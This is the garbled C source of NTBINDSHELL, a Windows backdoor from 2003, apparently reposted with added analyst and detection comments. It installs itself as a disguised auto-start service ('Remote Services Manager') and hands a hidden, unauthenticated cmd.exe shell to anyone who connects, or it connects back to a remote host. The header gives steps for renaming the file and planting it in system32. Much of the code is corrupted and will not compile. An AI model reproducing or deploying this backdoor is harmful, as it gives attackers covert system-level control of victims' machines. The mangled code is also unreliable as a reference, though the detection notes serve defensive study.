NTBINDSHELL source sharing / *
*
Win32
Rootkit - cmd.exe Remote Shell Backdoor
* (c) 2003 Christophe Devine <Devine@cr0.net>
* Distributed for educational purposes online
*
* Before Running NTBINDSHELL.EXE, RENAME IT TO
* "RSMSS.EXE" and copy it INTO% WINDIR% / system32.
* This Program Will Automatically Register Itself
* AS A System Service The First Time It Is Run,
* Provided it has the required privileges.
*
* To remove the service, start Regedit and delete
* HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
* Services\RSMSS, then reboot the computer.
*
* Backdoor USAGE:
*
* Normal (Listen) Mode: rsmss
* Reverse-Connect Mode: rsmss
*/
#include
/* Default TCP port: the listening port in normal mode and the port connected
 * back to in reverse-connect mode. ServiceMain overrides it with the first
 * command-line argument. Defender note: this port, the service key name and
 * the display name below are the static host indicators this sample leaves. */
#define default_port 26103
/* Service key name (installed under CurrentControlSet\Services, see the
 * removal instructions in the header) and the display name shown by the
 * Services console. Both are passed to CreateService in WinMain. */
Char service [] = "rsmss"; char displayName [] = "Remote Services Manager";
/* Process-wide argument vector: filled by WinMain from GetCommandLine() and
 * read by ServiceMain (argv[1] = port; a third argument switches to
 * reverse-connect mode). Fixed capacity of 8 entries. */
Int argc; char * argv [8];
/* SCM control handler. The only control acted on is SERVICE_CONTROL_SHUTDOWN,
 * which terminates the process. ServiceMain reports SERVICE_ACCEPT_SHUTDOWN
 * only, so an ordinary stop request through the SCM is not accepted; this is
 * consistent with the header's removal procedure (delete the key, reboot). */
Void WinApi Handler (DWord FDWControl) {if (fdwcontrol == service_control_shutdown) {EXITPROCESS (0);}}
/* Service entry point. Registers with the SCM, then either listens on a TCP
 * port (normal mode) or repeatedly connects out to a host (reverse-connect
 * mode), and for every connection spawns cmd.exe with the socket as its
 * standard handles. No authentication of the peer happens anywhere in this
 * function: whoever completes the TCP connection gets the shell.
 * NOTE(review): the text of this copy is garbled (random case, dropped
 * characters), so the lines below are documentation of intent, not a
 * compilable listing. */
Void WinAPI Servicemain (DWORD DWARGC, LPTSTR * LPSZARGV) {StartupInfo sinfo; process_information pinfo; service_status_handle sth; service_status status; wsadata wsadata;
Unsigned char buffer [4096]; struct hostent * client_host; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int server_sock, client_sock, n; unsigned short int port;
/* Register the control handler and report RUNNING immediately. Only
 * SERVICE_ACCEPT_SHUTDOWN is advertised, so "stop" is not accepted. */
Sth = registerServiceCtrlHandler (ServiceName, Handler);
MEMSET (& status, 0, sizeof (service_status));
STATUS.DWSERVICETYPE = service_win32_oen_process; status.dwcurrentState = service_running; status.dwcontrolsaccepted = service_accept_shutdown; status.dwwin32exitcode = no_error;
SetServiceStatus (Sth, & status);
/* Port comes from argv[1] via atoi; an unparseable or zero value falls back
 * to default_port (26103). */
Port = default_port; if (argc> 1) {if (! (port = ATOI (argv [1]))) {port = default_port;}}
IF (WsaStartup (MakeWord (2,0), & WSADATA) {Return;}
/* Normal (listen) mode, taken when fewer than three arguments were given:
 * bind to INADDR_ANY on the chosen port with a backlog of 10. Detection:
 * the service process holding a listening TCP socket on all interfaces
 * (port 26103 unless overridden). */
IF (Argc <3) {if (! (Server_Sock = WSASSOCKET (AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0))) {Return;}
n = sizeof (server_addr);
MEMSET (& Server_ADDR, 0, N);
Server_addr.sin_addr.s_addr = htonl (inaddr_any); server_addr.sin_family = AF_INET; Server_Addr.sin_Port = HTONS (port);
IF ((Bind (Server_Sock, (const struct socketdr *) & server_addr, n))))) {Return;}
IF (Listen (Server_Sock, 10)) {return;}}
/* Connection loop; never exits. Listen mode blocks in accept(). Reverse
 * mode sleeps 10 s between attempts, resolves a host name (the argument is
 * lost in this copy; presumably argv[2], given the argc < 3 test — verify)
 * and connects to it on the same port. Detection for reverse mode: a
 * service process making outbound connection attempts roughly every 10 s. */
While (1) {n = sizeof (client_addr);
IF (argc <3) {IF (! (CLIENT_SOCK = Accept (Server_Sock, (Struct SockAddr *) & Client_addr, & n))) {Continue;}} else {Sleep (10000);
IF (! (CLIENT_HOST = gethostByname))) {Continue;
MEMSET (& Client_Addr, 0, N);
Memcpy (void *) & client_addr.sin_addr, (void *) Client_host-> h_addr, client_host-> h_length;
Client_addr.sin_family = af_INET; client_addr.sin_port = htons (port);
IF (! (CLIENT_SOCK = WSASOCKET (AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0))) {Continue;
IF (Connect (Client_Sock, (Struct SockAddr *) & Client_Addr, N))) {Continue;}}
/* The child inherits the connected socket as stdin, stdout and stderr and
 * is started with a hidden window. */
GetStartupinfo (& SINFO);
sinfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; sinfo.wShowWindow = SW_HIDE; sinfo.hStdInput = (void *) client_sock; sinfo.hStdOutput = (void *) client_sock; sinfo.hStdError = (void *) client_sock;
/* Build "<system directory>\cmd.exe" one character at a time and set the
 * working directory to the drive root. The '//' and '/ 0' below are
 * garbles of '\\' and '\0' in this copy. Analyst note: because the name is
 * assembled byte by byte, the literal "cmd.exe" does not appear in the
 * binary's string table. */
GetsystemDirectory (buffer, max_path);
n = strlen (buffer);
Buffer [n] = '//'; buffer [n 5] = 'e'; buffer [n 1] = 'c'; buffer [n 6] = 'x'; buffer [n 2] = 'm'; buffer [n 7] = 'E'; buffer [n 3] = 'd'; buffer [n 8] = '/ 0'; buffer [n 4] = '.'; setCurrentDirectory ("//");
/* Spawn the shell with bInheritHandles = TRUE so the socket handles above
 * are passed through; on failure the socket is shut down and the loop
 * continues. WinMain creates the service with a NULL account, which the
 * Win32 API treats as LocalSystem, so the shell presumably runs as
 * LocalSystem — confirm against the install path actually used. Detection:
 * cmd.exe whose parent is this service process and whose standard handles
 * are a socket. */
IF (! CreateProcess (Buffer, Null, Null, Null, True, Create_New_Console, Null, Null, & Sinfo, & Pinfo) {Shutdown (Client_Sock, 2); Continue;}
/* Parent drops its reference to the socket; the child keeps the inherited
 * handle for the lifetime of the shell. */
CloseSocket (Client_sock);}}
Int WinApi Winmain (Hinstance Hinstance, Hinstance Hprevinstance, LPSTR LPCMDLINE, INT NCMDSHOW) {SC_HANDLE SC1, SC2;
Service_table_entry ste [2] = {{{servicename, servicemain}, {null, null}}
Unsigned char * c = getcommandline ();
if (sc1 = OpenSCManager (NULL, NULL, SC_MANAGER_ALL_ACCESS)) {if (sc2 = OpenService (sc1, ServiceName, SERVICE_START)) {CloseServiceHandle (sc2);} else {if (GetLastError () == ERROR_SERVICE_DOES_NOT_EXIST) {sc2 = CreateService ( SC1, ServiceName, DisplayName, Service_all_Access, Service_WIN32_OWN_PROCESS, Service_Auto_Start, Service_ERROR_IGNORE, C, NULL, NULL, NULL, NULL, NULL
IF (SC2! = null) {StartService (SC2, 0, NULL); ClosESERVICEHANDLE (SC2); ClosESERVICEHANDLE (SC1); Return (0);}}}}
ClosESERVICEHANDLE (SC1);
Argc = 0;
While (1) {while (Isspace (* c)) C ;
IF (* c == '/ 0') Break;
Argv [Argc ] = C;
IF (* C == '") {while (* c! ='") IF (* C == '/ 0') goto argv_done; c ;} else {while (! issspace (* c)) IF (* C == '/ 0') goto argv_done;}
* C = '/ 0';}
Argv_done:
IF (! StartServiceCtrldispatcher (ste)) {servicemain (0, null);
Return (1);